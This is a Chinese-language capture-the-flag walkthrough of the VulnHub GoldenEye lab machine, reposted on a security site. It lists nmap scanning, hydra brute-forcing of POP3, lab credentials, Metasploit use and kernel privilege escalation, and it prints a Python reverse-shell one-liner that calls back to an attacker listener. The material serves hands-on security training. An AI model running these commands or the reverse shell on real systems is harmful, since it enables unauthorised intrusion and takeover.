您的位置 首页 CTF

vulnhub-GoldenEye-wp

靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 靶机难…

靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/

靶机难度:中等(CTF)

靶机发布日期:2018年5月4日

靶机描述:靶机命名来自詹士邦系列的电影——GoldenEye

目标:得到root权限&找到flag.txt

一、信息收集

1.arp-scan-l 收集目标ip

2.使用命令:nmap -sP 192.168.182.0/24

3.使用命令:nmap -sS -sV -T5 -A -p- 192.168.182.141

4.到/sev-home/目录中。

5.检查主页的html内容以获取任何有用的提示(F12查看)

6.发现了一个用户名和密码,然后发现了一个编码加密

7,使用burp解密模块解密。

8.然后登录

9.然后使用f12查看,发现了pop3服务。POP3服务器的端口:55006、55007。

10.浏览器上访问发现是55007端口。

11.开始生成字典,开始爆破密码。

12.开始使用nc连接,用户:boris 密码:secret1! 用户:natalya 密码:bird

然后开始读邮件

13.使用,用户:natalya 密码:bird,开始都邮件。

14.找到了敏感信息泄露

15.进入/etc/hosts目录,加入severnaya-station.com

用户名:xenia

密码:RCP90rulez!

域:severnaya-station.com

网址:severnaya-station.com/gnocertdir

我们现根据邮件提示添加本地域名:severnaya-station.com

16.本地访问。

17登录之后,发现一个doak用户

18.加入字典

19.开始爆破用户

hydra -L x.txt -P /usr/share/wordlists/fasttrack.txt 10.10.10.149 -s 55007 pop3

19.使用nc连接。

20.发现了版本2.2.3的cms。

21.发现了一个敏感文件。

22.发现了目录

23访问一下看看。使用wget下载到本地,wget http://severnaya-station.com/dir007key/for-007.jpg

24.使用binwalk(路由逆向分析工具)、exiftool(图虫)、strings(识别动态库版本指令)等查看图片。

25.发现base64加密。

26.解密。xWinter1995x!

27.使用admin/xWinter1995x! 登录。

28.浏览器搜索历史漏洞。

二 渗透

1.使用msf,查找历史漏洞。

2.设置payload。

3.更改编译环境。

4.使用python脚本提权。

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.10.128”,6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);

5.kali使用nc监听6666端口

三、提权

1.下载提权脚本。

2.进入文件目录。

3.开启远程文件传输

4.然后在目标机器传输脚本

5.将gcc编译改为cc编译。

6.使用chmod+x权限

使用./exp提权

7.提权成功,然后访问root目录,查看flag。

总结

希望这篇文章可以帮助到你,我也是初学者,希望会的大佬勿喷,如果有错误的地方请指出来,我一定虚心改正。如果有好的方法,大家可以分享出来,多多交流。

本文来自网络,不代表F12sec立场,转载请注明出处:http://www.0dayhack.net/index.php/2335/
头像

作者: pony686

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

CAPTCHAis initialing...
联系我们

联系我们

QQ群:884338047

在线咨询: QQ交谈

邮箱: 2676666667@qq.com

工作时间:周一至周五,9:00-17:30,节假日休息

关注微信
微信扫一扫关注我们

微信扫一扫关注我们

关注微博
返回顶部